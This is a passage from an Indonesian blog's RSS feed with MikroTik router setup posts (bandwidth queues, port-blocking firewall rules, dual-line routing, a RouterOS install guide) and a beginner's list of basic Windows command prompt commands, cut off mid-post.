queue simple add name=kbu-02 target-addresses=192.168.0.12&lt;br /&gt;
queue simple add name=kbu-03 target-addresses=192.168.0.13&lt;br /&gt;
queue simple add name=kbu-04 target-addresses=192.168.0.14&lt;br /&gt;
queue simple add name=kbu-05 target-addresses=192.168.0.15&lt;br /&gt;
queue simple add name=kbu-06 target-addresses=192.168.0.16&lt;br /&gt;
queue simple add name=kbu-07 target-addresses=192.168.0.17&lt;br /&gt;
queue simple add name=kbu-08 target-addresses=192.168.0.18&lt;br /&gt;
queue simple add name=kbu-09 target-addresses=192.168.0.19&lt;br /&gt;
queue simple add name=kbu-10 target-addresses=192.168.0.20&lt;br /&gt;
queue simple add name=xbilling target-addresses=192.168.0.2 &lt;br /&gt;
&lt;br /&gt;
BLOX SPAM____________________________&lt;br /&gt;
/ip firewall filter add chain=forward dst-port=135-139 protocol=tcp action=drop&lt;br /&gt;
/ip firewall filter add chain=forward dst-port=135-139 protocol=udp action=drop&lt;br /&gt;
/ip firewall filter add chain=forward dst-port=445 protocol=tcp action=drop&lt;br /&gt;
/ip firewall filter add chain=forward dst-port=445 protocol=udp action=drop&lt;br /&gt;
/ip firewall filter add chain=forward dst-port=593 protocol=tcp action=drop&lt;br /&gt;
/ip firewall filter add chain=forward dst-port=4444 protocol=tcp action=drop&lt;br /&gt;
/ip firewall filter add chain=forward dst-port=5554 protocol=tcp action=drop&lt;br /&gt;
/ip firewall filter add chain=forward dst-port=9996 protocol=tcp action=drop&lt;br /&gt;
/ip firewall filter add chain=forward dst-port=995-999 protocol=udp action=drop&lt;br /&gt;
/ip firewall filter add chain=forward dst-port=53 protocol=tcp action=drop&lt;br /&gt;
/ip firewall filter add chain=forward dst-port=55 protocol=tcp action=drop &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background: white;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;span lang="IN" style="color: #333333; font-family: &amp;quot;Verdana&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 9.0pt; mso-ansi-language: IN;"&gt;TAMBAHAN UNTUK DUA JALUR LINE SPEEDY&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;"&gt;&lt;span lang="IN" style="font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ansi-language: IN; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: IN;"&gt;/ ip route&lt;br /&gt;
add dst-address=0.0.0.0/0 gateway=192.168.1.1,192.168.2.1 check-gateway=ping&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;"&gt;&lt;span lang="IN" style="font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ansi-language: IN; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: IN;"&gt;/ip firewall nat&lt;br /&gt;
add chain=srcnat out-interface=speedy1 action=masquerade&lt;br /&gt;
add chain=srcnat out-interface=speedy2 action=masquerade&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;"&gt;&lt;span lang="IN" style="font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ansi-language: IN; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: IN;"&gt;/ ip firewall mangle&lt;br /&gt;
add chain=input in-interface=speedy1 action=mark-connection new-connection-mark=speedy1_conn&lt;br /&gt;
add chain=input in-interface=speedy2 action=mark-connection new-connection-mark=speedy2_conn&lt;br /&gt;
add chain=output connection-mark=speedy1_conn action=mark-routing new-routing-mark=to_speedy1&lt;br /&gt;
add chain=output connection-mark=speedy2_conn action=mark-routing new-routing-mark=to_speedy2&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;"&gt;&lt;span lang="IN" style="font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ansi-language: IN; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-fareast-language: IN;"&gt;/ ip route&lt;br /&gt;
add dst-address=0.0.0.0/0 gateway=192.168.2.1 routing-mark=to_speedy1&lt;br /&gt;
add dst-address=0.0.0.0/0 gateway=192.168.1.1 routing-mark=to_speedy2&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-2948323159931063913?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-04-25T06:39:55.314+07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>instal mikrotik RouterOs</title><link>http://vanzuearticles.blogspot.com/2010/04/instal-mikrotik-routeros.html</link><category>Setting Mikrotik</category><author>vanzue@gmail.com</author><pubDate>Sat, 24 Apr 2010 16:34:53 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-1459499020555913110</guid><description>&lt;div class="MsoNormal"&gt;&lt;strong&gt;instal mikrotik RouterOs&lt;/strong&gt;&lt;/div&gt;&lt;ul type="disc"&gt;&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"&gt;Siapkan PC,&lt;br /&gt;
minimal Pentium I RAM 64,HD 500M atau pake flash memory 64&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"&gt;Di PC yang telah disiapkan      harus ada minimal 2 ethernet, 1 ke arah luar dan 1 lagi ke Network local,      diasumsikan sebagai berikut:&lt;br /&gt;
ether1 (yang paling atas atau yang onboard) untuk ke WAN (ISP/Internet)&lt;br /&gt;
ether2 untuk ke jaringan lokal.&lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"&gt;boot dg cd mikrotik &lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"&gt;setelah bisa boot pake iso      linux, pilih beberapa paket yang dibutuhkan. (kalo bingung centang aja      semua) &lt;/li&gt;
&lt;li class="MsoNormal" style="mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"&gt;ikuti aja langkahnya tekan      (Yes) (Yes)&lt;br /&gt;
setelah restart, login : admin pass : (kosong)&lt;br /&gt;
trus copy paste aja tulisan berikut ; &lt;/li&gt;
&lt;/ul&gt;IP ADDRESS_______________&lt;br /&gt;
ip address add interface=ether1 address=XXXXX (ip dari ISP)&lt;br /&gt;
ip address add interface=ether2 address=192.168.0.1/24 (ip tergantung keinginan)&lt;br /&gt;
route_______________&lt;br /&gt;
ip route add gateway=XXXXX (ip gateway dari ISP) &lt;br /&gt;
dns___________&lt;br /&gt;
ip dns set primary-dns=XXXXX (ip DNS dari ISP)&lt;br /&gt;
ip dns set secondary-dns=XXXXX (ip DNS dari ISP)&lt;br /&gt;
nat _______________&lt;br /&gt;
ip firewall nat add action=masquerade chain=srcnat&lt;br /&gt;
selesai .....&lt;br /&gt;
sambungkan sebuah client ke router (ether2)&lt;br /&gt;
seting :&lt;br /&gt;
ip address client 192.168.0.X --&amp;gt; X = nilai 2 sampai 254&lt;br /&gt;
subnetmask 255.255.255.0&lt;br /&gt;
gateway 192.168.0.1&lt;br /&gt;
primary dan secondari DNS tergantung ISP&lt;br /&gt;
cek browser internet&lt;br /&gt;
jika tidak jalan cek di command prompt&lt;br /&gt;
ping 192.168.0.1(cek koneksi ke gateway kita)&lt;br /&gt;
jika tidak jalan cek setting ip di client, cek konfigurasi kabel&lt;br /&gt;
jika client langsung ke router pake kabel UTP konfigurasi cross kalo melalui hub dulu pake konfigurasi straight&lt;br /&gt;
jika reply&lt;br /&gt;
ping ke gateway ISP&lt;br /&gt;
jika tidak jalan cek kabel UTP , cek kinfigurasi mikrotik, apakah sesuai dengan konfigurasi yang diberikan ISP atau tidak&lt;br /&gt;
untuk cek&lt;br /&gt;
IP address --&amp;gt; ip address print&lt;br /&gt;
&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5600527777189492149-1459499020555913110?l=vanzuearticles.blogspot.com' alt='' /&gt;&lt;/div&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2010-04-25T06:34:53.660+07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Perintah Dasar Command Prompt</title><link>http://vanzuearticles.blogspot.com/2010/04/perintah-dasar-command-prompt.html</link><category>Hack Computer</category><author>vanzue@gmail.com</author><pubDate>Wed, 07 Apr 2010 00:56:47 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-5600527777189492149.post-8991590930482888075</guid><description>&lt;span class="fullpost"&gt;&lt;span class="Apple-style-span" style="color: #666666; font-family: Arial, Helvetica, sans-serif; font-size: 12px;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;h2 style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/stripe1.gif); background-origin: initial; background-position: 50% 100%; background-repeat: repeat no-repeat; font-size: 16px; font-weight: normal; line-height: 19px; margin-bottom: 11px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 13px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span style="color: #666666; display: inline-block; line-height: 19px; padding-bottom: 13px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Perintah Dasar Command&amp;nbsp;Prompt&lt;/span&gt;&lt;/h2&gt;&lt;div class="post_content" style="line-height: 19px;"&gt;&lt;div class="snap_preview"&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Langsung aja kalian buka command prompt kalian…&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Pilih Start &amp;gt; Run… &amp;gt; pada jendela Run… ketikkan cmd.&lt;br /&gt;
Gambar 1 : Kotak dialog Run&lt;a href="http://kidzoom.files.wordpress.com/2010/03/image37.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="image" border="0" height="132" src="http://kidzoom.files.wordpress.com/2010/03/image_thumb37.png?w=244&amp;amp;h=132" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="image" width="244" /&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Kemudian tekan [Enter].&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong&gt;Nah sekarang kita akan mengenal beberapa perintah dasar CMD&lt;/strong&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;span id="more-439"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;PERINTAH PERINTAH PADA COMMAND PROMPT&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Date&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Perintah Date berfungsi untuk menampilkan tanggal atau untuk menset tanggal.&lt;a href="http://kidzoom.files.wordpress.com/2010/03/1.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="1" border="0" height="65" src="http://kidzoom.files.wordpress.com/2010/03/1_thumb.png?w=244&amp;amp;h=65" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="1" width="244" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Vol [drive]&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Berfungsi untuk menampilkan label suatu drive dan serial numbernya.&lt;a href="http://kidzoom.files.wordpress.com/2010/03/2.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="2" border="0" height="85" src="http://kidzoom.files.wordpress.com/2010/03/2_thumb.png?w=244&amp;amp;h=85" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="2" width="244" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Time [/T]&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Time tanpa parameter /T akan menampilan waktu saat ini dan menset dengan yang baru. Time dengan parameter /T akan menampilan waktu.&lt;a href="http://kidzoom.files.wordpress.com/2010/03/3.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="3" border="0" height="90" src="http://kidzoom.files.wordpress.com/2010/03/3_thumb.png?w=244&amp;amp;h=90" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="3" width="244" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Title[string]&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Berfungsi untuk mengganti nama pada window title dengan yang baru.&lt;a href="http://kidzoom.files.wordpress.com/2010/03/4.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="4" border="0" height="86" src="http://kidzoom.files.wordpress.com/2010/03/4_thumb.png?w=274&amp;amp;h=86" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="4" width="274" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Ver&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Berfungsi untuk menampilan versi dari windows yang dipakai.&lt;a href="http://kidzoom.files.wordpress.com/2010/03/5.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="5" border="0" height="47" src="http://kidzoom.files.wordpress.com/2010/03/5_thumb.png?w=244&amp;amp;h=47" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: block; float: none; height: auto !important; margin-bottom: 10px; margin-left: auto; margin-right: auto; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="5" width="244" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Cls&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Berfungsi untuk membersihkan layar.&lt;/div&gt;&lt;ul style="line-height: 0px; list-style-type: none; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: url(http://s0.wp.com/wp-content/themes/pub/monochrome/img/bullet1.gif); background-origin: initial; background-position: 3px 7px; background-repeat: no-repeat no-repeat; line-height: 19px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 18px; padding-right: 0px; padding-top: 0px; zoom: 1;"&gt;Color [attr]&lt;/li&gt;
&lt;/ul&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;Berfungsi untuk mengubah warna dari background dan foreground pada command&lt;br /&gt;
prompt.&lt;br /&gt;
Attr : adalah parameter untuk warnanya.&lt;br /&gt;
Attr terdiri dari 2 nilai hexadecimal, nilai pertama untuk menentukan warna&lt;br /&gt;
background dan nilai kedua untuk menentukan warna pada foreground.&lt;br /&gt;
Daftar warnanya sebagai berikut :&lt;br /&gt;
0 = Hitam&lt;br /&gt;
1 = Biru&lt;br /&gt;
2 = Hijau&lt;br /&gt;
3 = Aqua&lt;br /&gt;
4 = Merah&lt;br /&gt;
5 = Unggu&lt;br /&gt;
6 = Kuning&lt;br /&gt;
7 = Putih&lt;br /&gt;
8 = Abu-abu&lt;br /&gt;
9 = Light Blue&lt;br /&gt;
A = Light Green&lt;br /&gt;
B = Light Aqua&lt;br /&gt;
C = Light Red&lt;br /&gt;
D = Light Purple&lt;br /&gt;
E = Light Yellow&lt;br /&gt;
F = Bright White&lt;br /&gt;
Contoh :&lt;/div&gt;&lt;div style="line-height: 24px; margin-bottom: 1em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;a href="http://kidzoom.files.wordpress.com/2010/03/6.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="6" border="0" height="94" src="http://kidzoom.files.wordpress.com/2010/03/6_thumb.png?w=195&amp;amp;h=94" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: inline; height: auto !important; margin-bottom: 10px; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="6" width="195" /&gt;&lt;/a&gt;&amp;nbsp;&lt;a href="http://kidzoom.files.wordpress.com/2010/03/7.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="7" border="0" height="92" src="http://kidzoom.files.wordpress.com/2010/03/7_thumb.png?w=193&amp;amp;h=92" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: initial; display: inline; height: auto !important; margin-bottom: 10px; max-width: 98%; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;" title="7" width="193" /&gt;&lt;/a&gt;&amp;nbsp;&lt;a href="http://kidzoom.files.wordpress.com/2010/03/8.png" style="color: #2089cc; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: underline;"&gt;&lt;img alt="8" border="0" height="93" src="http://kidzoom.files.wordpress.com/2010/03/8_thumb.png?w=195&amp;amp;h=93" style="background-attachment: initial; background-clip: initial; background-color: #f2f2f2; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 0px; border-color: initial; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 0px; border-right-color: rgb(204, 204, 204); border-right-style: solid; border-right-width: 0px; border-top-color: rgb(204, 204, 204); border-top-style: solid; border-top-width: 0px; border-width: 